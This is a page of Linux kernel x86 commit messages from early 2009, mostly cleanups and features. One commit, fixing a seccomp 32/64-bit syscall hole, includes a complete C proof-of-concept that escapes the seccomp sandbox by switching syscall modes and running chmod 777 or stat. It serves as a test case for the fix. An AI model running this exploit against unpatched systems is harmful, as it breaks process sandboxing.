1. 11 3月, 2009 1 次提交
  2. 07 3月, 2009 1 次提交
    • C
      x86: linkage.h - guard assembler specifics by __ASSEMBLY__ · 7ab15247
      Cyrill Gorcunov 提交于
      Stephen Rothwell reported:
      
      |Today's linux-next build (x86_64 allmodconfig) produced this warning:
      |
      |In file included from drivers/char/epca.c:49:
      |drivers/char/digiFep1.h:7:1: warning: "GLOBAL" redefined
      |In file included from include/linux/linkage.h:5,
      |                 from include/linux/kernel.h:11,
      |                 from arch/x86/include/asm/system.h:10,
      |                 from arch/x86/include/asm/processor.h:17,
      |                 from include/linux/prefetch.h:14,
      |                 from include/linux/list.h:6,
      |                 from include/linux/module.h:9,
      |                 from drivers/char/epca.c:29:
      |arch/x86/include/asm/linkage.h:55:1: warning: this is the location of the previous definition
      |
      |Probably introduced by commit 95695547
      |("x86: asm linkage - introduce GLOBAL macro") from the x86 tree.
      
      Any assembler specific snippets being placed in headers
      are to be protected by __ASSEMBLY__. Fixed.
      
      Also move __ALIGN definition under the same protection as well.
      Reported-by: NStephen Rothwell <sfr@canb.auug.org.au>
      Signed-off-by: NCyrill Gorcunov <gorcunov@openvz.org>
      LKML-Reference: <20090306160833.GB7420@localhost>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      7ab15247
  3. 05 3月, 2009 9 次提交
  4. 04 3月, 2009 1 次提交
  5. 03 3月, 2009 2 次提交
    • P
      x86: set_highmem_pages_init() cleanup · 867c5b52
      Pekka Enberg 提交于
      Impact: cleanup
      
      This patch moves set_highmem_pages_init() to arch/x86/mm/highmem_32.c.
      
      The declaration of the function is kept in asm/numa_32.h because
      asm/highmem.h is included only if CONFIG_HIGHMEM is enabled so we
      can't put the empty static inline function there.
      Signed-off-by: NPekka Enberg <penberg@cs.helsinki.fi>
      LKML-Reference: <1236082212.2675.24.camel@penberg-laptop>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      867c5b52
    • R
      x86-64: seccomp: fix 32/64 syscall hole · 5b101740
      Roland McGrath 提交于
      On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
      ljmp, and then use the "syscall" instruction to make a 64-bit system
      call.  A 64-bit process make a 32-bit system call with int $0x80.
      
      In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
      the wrong system call number table.  The fix is simple: test TS_COMPAT
      instead of TIF_IA32.  Here is an example exploit:
      
      	/* test case for seccomp circumvention on x86-64
      
      	   There are two failure modes: compile with -m64 or compile with -m32.
      
      	   The -m64 case is the worst one, because it does "chmod 777 ." (could
      	   be any chmod call).  The -m32 case demonstrates it was able to do
      	   stat(), which can glean information but not harm anything directly.
      
      	   A buggy kernel will let the test do something, print, and exit 1; a
      	   fixed kernel will make it exit with SIGKILL before it does anything.
      	*/
      
      	#define _GNU_SOURCE
      	#include <assert.h>
      	#include <inttypes.h>
      	#include <stdio.h>
      	#include <linux/prctl.h>
      	#include <sys/stat.h>
      	#include <unistd.h>
      	#include <asm/unistd.h>
      
      	int
      	main (int argc, char **argv)
      	{
      	  char buf[100];
      	  static const char dot[] = ".";
      	  long ret;
      	  unsigned st[24];
      
      	  if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
      	    perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");
      
      	#ifdef __x86_64__
      	  assert ((uintptr_t) dot < (1UL << 32));
      	  asm ("int $0x80 # %0 <- %1(%2 %3)"
      	       : "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
      	  ret = snprintf (buf, sizeof buf,
      			  "result %ld (check mode on .!)\n", ret);
      	#elif defined __i386__
      	  asm (".code32\n"
      	       "pushl %%cs\n"
      	       "pushl $2f\n"
      	       "ljmpl $0x33, $1f\n"
      	       ".code64\n"
      	       "1: syscall # %0 <- %1(%2 %3)\n"
      	       "lretl\n"
      	       ".code32\n"
      	       "2:"
      	       : "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
      	  if (ret == 0)
      	    ret = snprintf (buf, sizeof buf,
      			    "stat . -> st_uid=%u\n", st[7]);
      	  else
      	    ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
      	#else
      	# error "not this one"
      	#endif
      
      	  write (1, buf, ret);
      
      	  syscall (__NR_exit, 1);
      	  return 2;
      	}
      Signed-off-by: NRoland McGrath <roland@redhat.com>
      [ I don't know if anybody actually uses seccomp, but it's enabled in
        at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
      Signed-off-by: NLinus Torvalds <torvalds@linux-foundation.org>
      5b101740
  6. 02 3月, 2009 5 次提交
    • J
      xen: deal with virtually mapped percpu data · 9976b39b
      Jeremy Fitzhardinge 提交于
      The virtually mapped percpu space causes us two problems:
      
       - for hypercalls which take an mfn, we need to do a full pagetable
         walk to convert the percpu va into an mfn, and
      
       - when a hypercall requires a page to be mapped RO via all its aliases,
         we need to make sure its RO in both the percpu mapping and in the
         linear mapping
      
      This primarily affects the gdt and the vcpu info structure.
      Signed-off-by: NJeremy Fitzhardinge <jeremy.fitzhardinge@citrix.com>
      Cc: Xen-devel <xen-devel@lists.xensource.com>
      Cc: Gerd Hoffmann <kraxel@redhat.com>
      Cc: Rusty Russell <rusty@rustcorp.com.au>
      Cc: Tejun Heo <htejun@gmail.com>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      9976b39b
    • J
      x86: add forward decl for tss_struct · 2fb6b2a0
      Jeremy Fitzhardinge 提交于
      Its the correct thing to do before using the struct in a prototype.
      Signed-off-by: NJeremy Fitzhardinge <jeremy.fitzhardinge@citrix.com>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      2fb6b2a0
    • J
      x86: unify chunks of kernel/process*.c · 389d1fb1
      Jeremy Fitzhardinge 提交于
      With x86-32 and -64 using the same mechanism for managing the
      tss io permissions bitmap, large chunks of process*.c are
      trivially unifyable, including:
      
       - exit_thread
       - flush_thread
       - __switch_to_xtra (along with tsc enable/disable)
      
      and as bonus pickups:
      
       - sys_fork
       - sys_vfork
      
      (Note: asmlinkage expands to empty on x86-64)
      Signed-off-by: NJeremy Fitzhardinge <jeremy.fitzhardinge@citrix.com>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      389d1fb1
    • J
      x86-32: use non-lazy io bitmap context switching · db949bba
      Jeremy Fitzhardinge 提交于
      Impact: remove 32-bit optimization to prepare unification
      
      x86-32 and -64 differ in the way they context-switch tasks
      with io permission bitmaps.  x86-64 simply copies the next
      tasks io bitmap into place (if any) on context switch.  x86-32
      invalidates the bitmap on context switch, so that the next
      IO instruction will fault; at that point it installs the
      appropriate IO bitmap.
      
      This makes context switching IO-bitmap-using tasks a bit more
      less expensive, at the cost of making the next IO instruction
      slower due to the extra fault.  This tradeoff only makes sense
      if IO-bitmap-using processes are relatively common, but they
      don't actually use IO instructions very often.
      
      However, in a typical desktop system, the only process likely
      to be using IO bitmaps is the X server, and nothing at all on
      a server.  Therefore the lazy context switch doesn't really win
      all that much, and its just a gratuitious difference from
      64-bit code.
      
      This patch removes the lazy context switch, with a view to
      unifying this code in a later change.
      Signed-off-by: NJeremy Fitzhardinge <jeremy.fitzhardinge@citrix.com>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      db949bba
    • I
      x86, mm: dont use non-temporal stores in pagecache accesses · f1800536
      Ingo Molnar 提交于
      Impact: standardize IO on cached ops
      
      On modern CPUs it is almost always a bad idea to use non-temporal stores,
      as the regression in this commit has shown it:
      
        30d697fa: x86: fix performance regression in write() syscall
      
      The kernel simply has no good information about whether using non-temporal
      stores is a good idea or not - and trying to add heuristics only increases
      complexity and inserts fragility.
      
      The regression on cached write()s took very long to be found - over two
      years. So dont take any chances and let the hardware decide how it makes
      use of its caches.
      
      The only exception is drivers/gpu/drm/i915/i915_gem.c: there were we are
      absolutely sure that another entity (the GPU) will pick up the dirty
      data immediately and that the CPU will not touch that data before the
      GPU will.
      
      Also, keep the _nocache() primitives to make it easier for people to
      experiment with these details. There may be more clear-cut cases where
      non-cached copies can be used, outside of filemap.c.
      
      Cc: Salman Qazi <sqazi@google.com>
      Cc: Nick Piggin <npiggin@suse.de>
      Cc: Linus Torvalds <torvalds@linux-foundation.org>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      f1800536
  7. 01 3月, 2009 2 次提交
    • I
      Revert "gpu/drm, x86, PAT: PAT support for io_mapping_*" · f5c1aa15
      Ingo Molnar 提交于
      This reverts commit 17581ad8.
      
      Sitsofe Wheeler reported that /dev/dri/card0 is MIA on his EeePC 900
      and bisected it to this commit.
      
      Graphics card is an i915 in an EeePC 900:
      
       00:02.0 VGA compatible controller [0300]:
         Intel Corporation Mobile 915GM/GMS/910GML
           Express Graphics Controller [8086:2592] (rev 04)
      
      ( Most likely the ioremap() of the driver failed and hence the card
        did not initialize. )
      Reported-by: NSitsofe Wheeler <sitsofe@yahoo.com>
      Bisected-by: NSitsofe Wheeler <sitsofe@yahoo.com>
      Cc: Venkatesh Pallipadi <venkatesh.pallipadi@intel.com>
      Cc: Suresh Siddha <suresh.b.siddha@intel.com>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      f5c1aa15
    • T
      bootmem, x86: further fixes for arch-specific bootmem wrapping · d0c4f570
      Tejun Heo 提交于
      Impact: fix new breakages introduced by previous fix
      
      Commit c1329375 tried to clean up
      bootmem arch wrapper but it wasn't quite correct.  Before the commit,
      the followings were broken.
      
      * Low level interface functions prefixed with __ ignored arch
        preference.
      
      * reserve_bootmem(...) can't be mapped into
        reserve_bootmem_node(NODE_DATA(0)->bdata, ...) because the node is
        not preference here.  The region specified MUST fall into the
        specified region; otherwise, it will panic.
      
      After the commit,
      
      * If allocation fails for the arch preferred node, it should fallback
        to whatever is available.  Instead, it simply failed allocation.
      
      There are too many internal details to allow generic wrapping and
      still keep things simple for archs.  Plus, all that arch wants is a
      way to prefer certain node over another.
      
      This patch drops the generic wrapping around alloc_bootmem_core() and
      add alloc_bootmem_core() instead.  If necessary, arch can define
      bootmem_arch_referred_node() macro or function which takes all
      allocation information and returns the preferred node.  bootmem
      generic code will always try the preferred node first and then
      fallback to other nodes as usual.
      
      Breakages noted and changes reviewed by Johannes Weiner.
      Signed-off-by: NTejun Heo <tj@kernel.org>
      Acked-by: NJohannes Weiner <hannes@cmpxchg.org>
      d0c4f570
  8. 28 2月, 2009 8 次提交
  9. 26 2月, 2009 4 次提交
  10. 25 2月, 2009 7 次提交
    • V
      gpu/drm, x86, PAT: PAT support for io_mapping_* · 17581ad8
      Venkatesh Pallipadi 提交于
      Make io_mapping_create_wc and io_mapping_free go through PAT to make sure
      that there are no memory type aliases.
      Signed-off-by: NVenkatesh Pallipadi <venkatesh.pallipadi@intel.com>
      Signed-off-by: NSuresh Siddha <suresh.b.siddha@intel.com>
      Cc: Dave Airlie <airlied@redhat.com>
      Cc: Jesse Barnes <jbarnes@virtuousgeek.org>
      Cc: Eric Anholt <eric@anholt.net>
      Cc: Keith Packard <keithp@keithp.com>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      17581ad8
    • V
      gpu/drm, x86, PAT: io_mapping_create_wc and resource_size_t · 4ab0d47d
      Venkatesh Pallipadi 提交于
      io_mapping_create_wc should take a resource_size_t parameter in place of
      unsigned long. With unsigned long, there will be no way to map greater than 4GB
      address in i386/32 bit.
      
      On x86, greater than 4GB addresses cannot be mapped on i386 without PAE. Return
      error for such a case.
      
      Patch also adds a structure for io_mapping, that saves the base, size and
      type on HAVE_ATOMIC_IOMAP archs, that can be used to verify the offset on
      io_mapping_map calls.
      Signed-off-by: NVenkatesh Pallipadi <venkatesh.pallipadi@intel.com>
      Signed-off-by: NSuresh Siddha <suresh.b.siddha@intel.com>
      Cc: Dave Airlie <airlied@redhat.com>
      Cc: Jesse Barnes <jbarnes@virtuousgeek.org>
      Cc: Eric Anholt <eric@anholt.net>
      Cc: Keith Packard <keithp@keithp.com>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      4ab0d47d
    • V
      gpu/drm, x86, PAT: routine to keep identity map in sync · 7880f746
      Venkatesh Pallipadi 提交于
      Add a function to check and keep identity maps in sync, when changing
      any memory type. One of the follow on patches will also use this
      routine.
      Signed-off-by: NVenkatesh Pallipadi <venkatesh.pallipadi@intel.com>
      Signed-off-by: NSuresh Siddha <suresh.b.siddha@intel.com>
      Cc: Dave Airlie <airlied@redhat.com>
      Cc: Jesse Barnes <jbarnes@virtuousgeek.org>
      Cc: Eric Anholt <eric@anholt.net>
      Cc: Keith Packard <keithp@keithp.com>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      7880f746
    • I
      x86: usercopy: check for total size when deciding non-temporal cutoff · 95108fa3
      Ingo Molnar 提交于
      Impact: make more types of copies non-temporal
      
      This change makes the following simple fix:
      
        30d697fa: x86: fix performance regression in write() syscall
      
      A bit more sophisticated: we check the 'total' number of bytes
      written to decide whether to copy in a cached or a non-temporal
      way.
      
      This will for example cause the tail (modulo 4096 bytes) chunk
      of a large write() to be non-temporal too - not just the page-sized
      chunks.
      
      Cc: Salman Qazi <sqazi@google.com>
      Cc: Nick Piggin <npiggin@suse.de>
      Cc: Linus Torvalds <torvalds@linux-foundation.org>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      95108fa3
    • I
      x86, mm: pass in 'total' to __copy_from_user_*nocache() · 3255aa2e
      Ingo Molnar 提交于
      Impact: cleanup, enable future change
      
      Add a 'total bytes copied' parameter to __copy_from_user_*nocache(),
      and update all the callsites.
      
      The parameter is not used yet - architecture code can use it to
      more intelligently decide whether the copy should be cached or
      non-temporal.
      
      Cc: Salman Qazi <sqazi@google.com>
      Cc: Nick Piggin <npiggin@suse.de>
      Cc: Linus Torvalds <torvalds@linux-foundation.org>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      3255aa2e
    • T
      x86: convert cacheflush macros inline functions · d3251005
      Tejun Heo 提交于
      Impact: cleanup
      
      Unused macro parameters cause spurious unused variable warnings.
      Convert all cacheflush macros to inline functions to avoid the
      warnings and achieve better type checking.
      Signed-off-by: NTejun Heo <tj@kernel.org>
      d3251005
    • A
      x86, mce, cmci: add CMCI support · 88ccbedd
      Andi Kleen 提交于
      Impact: Major new feature
      
      Intel CMCI (Corrected Machine Check Interrupt) is a new
      feature on Nehalem CPUs. It allows the CPU to trigger
      interrupts on corrected events, which allows faster
      reaction to them instead of with the traditional
      polling timer.
      
      Also use CMCI to discover shared banks. Machine check banks
      can be shared by CPU threads or even cores. Using the CMCI enable
      bit it is possible to detect the fact that another CPU already
      saw a specific bank. Use this to assign shared banks only
      to one CPU to avoid reporting duplicated events.
      
      On CPU hot unplug bank sharing is re discovered. This is done
      using a thread that cycles through all the CPUs.
      
      To avoid races between the poller and CMCI we only poll
      for banks that are not CMCI capable and only check CMCI
      owned banks on a interrupt.
      
      The shared banks ownership information is currently only used for
      CMCI interrupts, not polled banks.
      
      The sharing discovery code follows the algorithm recommended in the
      IA32 SDM Vol3a 14.5.2.1
      
      The CMCI interrupt handler just calls the machine check poller to
      pick up the machine check event that caused the interrupt.
      
      I decided not to implement a separate threshold event like
      the AMD version has, because the threshold is always one currently
      and adding another event didn't seem to add any value.
      
      Some code inspired by Yunhong Jiang's Xen implementation,
      which was in term inspired by a earlier CMCI implementation
      by me.
      Signed-off-by: NAndi Kleen <ak@linux.intel.com>
      Signed-off-by: NH. Peter Anvin <hpa@zytor.com>
      88ccbedd